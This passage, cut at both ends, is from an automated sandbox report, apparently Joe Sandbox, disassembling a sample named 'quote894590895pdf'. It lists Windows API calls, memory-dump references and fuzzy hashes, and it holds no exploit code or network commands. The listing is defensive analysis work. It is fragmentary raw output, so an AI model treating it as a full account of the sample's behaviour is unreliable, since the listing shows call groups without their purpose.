                                                                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00EB8DA4
                                                                    • PostMessageW.USER32(?,00000202,00000000), ref: 00EB8DB2
                                                                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00EB8DBA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePostSleep$RectWindow
                                                                    • String ID:
                                                                    • API String ID: 3382505437-0
                                                                    • Opcode ID: d2e3e084e74fb1503c05cc453127cddb6d6e9ae406438abb0f6a16c44cb4effa
                                                                    • Instruction ID: 9d7e1b7874bb71e84ae794bc02d04963b065ffca8f07bfbd5adc73ce0bf14d5a
                                                                    • Opcode Fuzzy Hash: d2e3e084e74fb1503c05cc453127cddb6d6e9ae406438abb0f6a16c44cb4effa
                                                                    • Instruction Fuzzy Hash: 6B31CE7190021DEFDF14CF68DA8CADE3BB9EB54315F10422AF925EA2D0C7B09914DB91
                                                                    APIs
                                                                    • IsWindowVisible.USER32(?), ref: 00EBB4C6
                                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00EBB4E3
                                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00EBB51B
                                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00EBB541
                                                                    • _wcsstr.LIBCMT ref: 00EBB54B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                    • String ID:
                                                                    • API String ID: 3902887630-0
                                                                    • Opcode ID: e440d7b223c7f655a03ce15b4148eb2eb20e350c3b2e7d87d2013286b080f656
                                                                    • Instruction ID: 07662bcd0790aa87032ccfa642eb59b7f2533ea24ed9fb97df25a5e32cce77f8
                                                                    • Opcode Fuzzy Hash: e440d7b223c7f655a03ce15b4148eb2eb20e350c3b2e7d87d2013286b080f656
                                                                    • Instruction Fuzzy Hash: 2E212C31605145BFEB255B399C45EBB7B9DEF45750F009039F909FA1A1EFA1DC0093A1
                                                                    APIs
                                                                      • Part of subcall function 00E62612: GetWindowLongW.USER32(?,000000EB), ref: 00E62623
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00EEB1C6
                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00EEB1EB
                                                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00EEB203
                                                                    • GetSystemMetrics.USER32(00000004), ref: 00EEB22C
                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00ED0FA5,00000000), ref: 00EEB24A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Long$MetricsSystem
                                                                    • String ID:
                                                                    • API String ID: 2294984445-0
                                                                    • Opcode ID: 167105348a6b9b40015b4806db6a40d19f9e5e05f61a51cc58597314cd25325a
                                                                    • Instruction ID: c16ccdc931256d608d1d1fe8d579c7dde2700de29a45f993a1b3b1ff770b1c3f
                                                                    • Opcode Fuzzy Hash: 167105348a6b9b40015b4806db6a40d19f9e5e05f61a51cc58597314cd25325a
                                                                    • Instruction Fuzzy Hash: E721823151169AAFCB109F3A9C48B6B37A4FF49725F105738FA25E61E0E7309815DB90
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00EB95E2
                                                                      • Part of subcall function 00E67D2C: _memmove.LIBCMT ref: 00E67D66
                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00EB9614
                                                                    • __itow.LIBCMT ref: 00EB962C
                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00EB9654
                                                                    • __itow.LIBCMT ref: 00EB9665
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$__itow$_memmove
                                                                    • String ID:
                                                                    • API String ID: 2983881199-0
                                                                    • Opcode ID: 423581271b22f86a45e409842b8a683fb9259eb94990098ac437a63444a6e912
                                                                    • Instruction ID: 1a2c4f24b7d0522f7b5802fb7ff7d156d90ba7d56586e236c6abb7988849f7d6
                                                                    • Opcode Fuzzy Hash: 423581271b22f86a45e409842b8a683fb9259eb94990098ac437a63444a6e912
                                                                    • Instruction Fuzzy Hash: 7C210731B00258BBDB10AB659C89EEF7BE8DF49714F042029FA04FB252D671CD459792
                                                                    APIs
                                                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E6134D
                                                                    • SelectObject.GDI32(?,00000000), ref: 00E6135C
                                                                    • BeginPath.GDI32(?), ref: 00E61373
                                                                    • SelectObject.GDI32(?,00000000), ref: 00E6139C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ObjectSelect$BeginCreatePath
                                                                    • String ID:
                                                                    • API String ID: 3225163088-0
                                                                    • Opcode ID: b8d97368cf34f4921631823053b55c57acd883a5910da2bd56f23d8579cb9925
                                                                    • Instruction ID: 2ab77756d3d9813b1719400fae290f5bea9b637d9ff0a46d093a475ace0fbbec
                                                                    • Opcode Fuzzy Hash: b8d97368cf34f4921631823053b55c57acd883a5910da2bd56f23d8579cb9925
                                                                    • Instruction Fuzzy Hash: 2221B63088060CDFDB218F65ED447AD3BE8FB00765F184256F411A62B0D3B19996EF51
                                                                    APIs
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00EC4B61
                                                                    • __beginthreadex.LIBCMT ref: 00EC4B7F
                                                                    • MessageBoxW.USER32(?,?,?,?), ref: 00EC4B94
                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00EC4BAA
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00EC4BB1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                    • String ID:
                                                                    • API String ID: 3824534824-0
                                                                    • Opcode ID: 69ba522de0f4087b25192031db45f953a3d903a86b9f2fa8a0a9f4f0df823b63
                                                                    • Instruction ID: 8fb281bdb3dd2566039041c9551431ed40f419355ebf504fed2eead453000752
                                                                    • Opcode Fuzzy Hash: 69ba522de0f4087b25192031db45f953a3d903a86b9f2fa8a0a9f4f0df823b63
                                                                    • Instruction Fuzzy Hash: C611E1B290564CEFC7119BA89C44F9B7FACAB45324F144269F814E72D1D672CD0587A1
                                                                    APIs
                                                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00EB8546
                                                                    • GetLastError.KERNEL32(?,00EB800A,?,?,?), ref: 00EB8550
                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00EB800A,?,?,?), ref: 00EB855F
                                                                    • HeapAlloc.KERNEL32(00000000,?,00EB800A,?,?,?), ref: 00EB8566
                                                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00EB857D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                    • String ID:
                                                                    • API String ID: 842720411-0
                                                                    • Opcode ID: e981c91e15f5c474b015721f39bda929f90748a777fa794111450c61d55990d8
                                                                    • Instruction ID: e88f73d18e68cff5c3ce6c7ac9472bb464ffaa45f1755554ccbd7a2e52d31f37
                                                                    • Opcode Fuzzy Hash: e981c91e15f5c474b015721f39bda929f90748a777fa794111450c61d55990d8
                                                                    • Instruction Fuzzy Hash: FC018671601248FFDB214FA6ED88DAB7F6CFF863557140529F809E7260DA31CD04CA60
                                                                    APIs
                                                                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00EC5307
                                                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00EC5315
                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00EC531D
                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00EC5327
                                                                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00EC5363
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                    • String ID:
                                                                    • API String ID: 2833360925-0
                                                                    • Opcode ID: 47e4c0be6393d3c8b4ee7d95b4b1a8ab912ad456be2b53080dd31f7683b944d6
                                                                    • Instruction ID: 4d331f52466a93d16078f41c26d138718f3bca8c471476bfc91d34981401e2b8
                                                                    • Opcode Fuzzy Hash: 47e4c0be6393d3c8b4ee7d95b4b1a8ab912ad456be2b53080dd31f7683b944d6
                                                                    • Instruction Fuzzy Hash: 7A016D32C02A5DDBCF009FA9EE88AEDBB78FB09301F05045AF941F6154CF71A59587A1
                                                                    APIs
                                                                    • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EB736C,80070057,?,?,?,00EB777D), ref: 00EB744F
                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EB736C,80070057,?,?), ref: 00EB746A
                                                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EB736C,80070057,?,?), ref: 00EB7478
                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EB736C,80070057,?), ref: 00EB7488
                                                                    • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EB736C,80070057,?,?), ref: 00EB7494
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                    • String ID:
                                                                    • API String ID: 3897988419-0
                                                                    • Opcode ID: 8b4bd23c6cf4f89a21442dcd6807223a25afb22b680042c981b377a1eae83d8f
                                                                    • Instruction ID: ecccbe090aa3a6771a6e3c1562c9236419d04dc54aa9f6d280acc585d3deb64f
                                                                    • Opcode Fuzzy Hash: 8b4bd23c6cf4f89a21442dcd6807223a25afb22b680042c981b377a1eae83d8f
                                                                    • Instruction Fuzzy Hash: CB017C72601208BFDB245F65DC84AEB7FADEB84762F145024F948E6220EB31DD449BA0
                                                                    APIs
                                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00EB83E8
                                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00EB83F2
                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00EB8401
                                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00EB8408
                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00EB841E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                    • String ID:
                                                                    • API String ID: 44706859-0
                                                                    • Opcode ID: d4fa8c720e093776671096498576c80eaaeab87747b60e6ce97c5a42d43b868b
                                                                    • Instruction ID: 267bb1962003df4a83508b8f2b6150340489c1ec80a1bfe0c7185f07d303afc9
                                                                    • Opcode Fuzzy Hash: d4fa8c720e093776671096498576c80eaaeab87747b60e6ce97c5a42d43b868b
                                                                    • Instruction Fuzzy Hash: 48F06831215249EFDB105F65ECCDEAB3BACEF89758B004429F945E6250CB71DC45DA60
                                                                    APIs
                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00EB8449
                                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00EB8453
                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00EB8462
                                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00EB8469
                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00EB847F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                    • String ID:
                                                                    • API String ID: 44706859-0
                                                                    • Opcode ID: fe54ab41caa1bcb0b7ede29f73d0858dfdd2aa6570fcfd9e03aa71e6076271ec
                                                                    • Instruction ID: 910edff5001f6ed2d06fc0de146378605fd00ece292845054d798f89d171bc40
                                                                    • Opcode Fuzzy Hash: fe54ab41caa1bcb0b7ede29f73d0858dfdd2aa6570fcfd9e03aa71e6076271ec
                                                                    • Instruction Fuzzy Hash: D1F06831201349AFDB111FA5ECC8EA73FACEF85758B040125F945E7290CB61DD45DA60
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00EBC4B9
                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 00EBC4D0
                                                                    • MessageBeep.USER32(00000000), ref: 00EBC4E8
                                                                    • KillTimer.USER32(?,0000040A), ref: 00EBC504
                                                                    • EndDialog.USER32(?,00000001), ref: 00EBC51E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                    • String ID:
                                                                    • API String ID: 3741023627-0
                                                                    • Opcode ID: 1b377926933b5726a9cab0b02c34d443e4894297600ab21ffd20d84adef0532d
                                                                    • Instruction ID: f84a9837335c65d5c562c85fe8a7ba475753e15cc25ba6469c4fc3714503f0ed
                                                                    • Opcode Fuzzy Hash: 1b377926933b5726a9cab0b02c34d443e4894297600ab21ffd20d84adef0532d
                                                                    • Instruction Fuzzy Hash: BE0144305447099BEB305B61DD8EBE777B8BB04709F101669F596B50E1DBA0A9588A80
                                                                    APIs
                                                                    • EndPath.GDI32(?), ref: 00E613BF
                                                                    • StrokeAndFillPath.GDI32(?,?,00E9BA08,00000000,?), ref: 00E613DB
                                                                    • SelectObject.GDI32(?,00000000), ref: 00E613EE
                                                                    • DeleteObject.GDI32 ref: 00E61401
                                                                    • StrokePath.GDI32(?), ref: 00E6141C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                    • String ID:
                                                                    • API String ID: 2625713937-0
                                                                    • Opcode ID: e39121c3f03e9938ac6e52d0acaa4537a7b9255e51d39609dcb19cf1ed72134d
                                                                    • Instruction ID: 597bc13ca3f0980391b0817d6de50a6ba877153c9fb9efecc8438a973c81c6e2
                                                                    • Opcode Fuzzy Hash: e39121c3f03e9938ac6e52d0acaa4537a7b9255e51d39609dcb19cf1ed72134d
                                                                    • Instruction Fuzzy Hash: 47F0EC30044B4CEFDB225F66EC8D7A83FA4A701766F0C9265F429691F1C771499AEF50
                                                                    APIs
                                                                    • CoInitialize.OLE32(00000000), ref: 00ECC4BE
                                                                    • CoCreateInstance.OLE32(00EF2D6C,00000000,00000001,00EF2BDC,?), ref: 00ECC4D6
                                                                      • Part of subcall function 00E67F41: _memmove.LIBCMT ref: 00E67F82
                                                                    • CoUninitialize.OLE32 ref: 00ECC743
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                    • String ID: .lnk
                                                                    • API String ID: 2683427295-24824748
                                                                    • Opcode ID: 9ba9a33001aa41dbda88c9181a1c20022c1f46983cf751f11498b271d0bbb1bd
                                                                    • Instruction ID: 08720623829bfb60c38956e6d355ad30a58b37d8feb4230afc71388052397431
                                                                    • Opcode Fuzzy Hash: 9ba9a33001aa41dbda88c9181a1c20022c1f46983cf751f11498b271d0bbb1bd
                                                                    • Instruction Fuzzy Hash: 36A16C71248305AFD300EF64D891EABB7ECEF94744F00591DF196AB1A2DB71EA09CB52
                                                                    APIs
                                                                      • Part of subcall function 00E80F36: std::exception::exception.LIBCMT ref: 00E80F6C
                                                                      • Part of subcall function 00E80F36: __CxxThrowException@8.LIBCMT ref: 00E80F81
                                                                      • Part of subcall function 00E67F41: _memmove.LIBCMT ref: 00E67F82
                                                                      • Part of subcall function 00E67BB1: _memmove.LIBCMT ref: 00E67C0B
                                                                    • __swprintf.LIBCMT ref: 00E7302D
                                                                    Strings
                                                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00E72EC6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                    • API String ID: 1943609520-557222456
                                                                    • Opcode ID: c20eb33beb313e264f9c37961a4514340b1c1d77da5bda240752f14ef85db451
                                                                    • Instruction ID: 4f3284de77ee9a667f6137bf45919781d125a75468d219d41fdb3fbc671cf6f2
                                                                    • Opcode Fuzzy Hash: c20eb33beb313e264f9c37961a4514340b1c1d77da5bda240752f14ef85db451
                                                                    • Instruction Fuzzy Hash: 8E917D712082019FC718EF24D895C6EB7E4EF86754F04A91DF599AB2A1DB30EE44CB52
                                                                    APIs
                                                                      • Part of subcall function 00E648AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E648A1,?,?,00E637C0,?), ref: 00E648CE
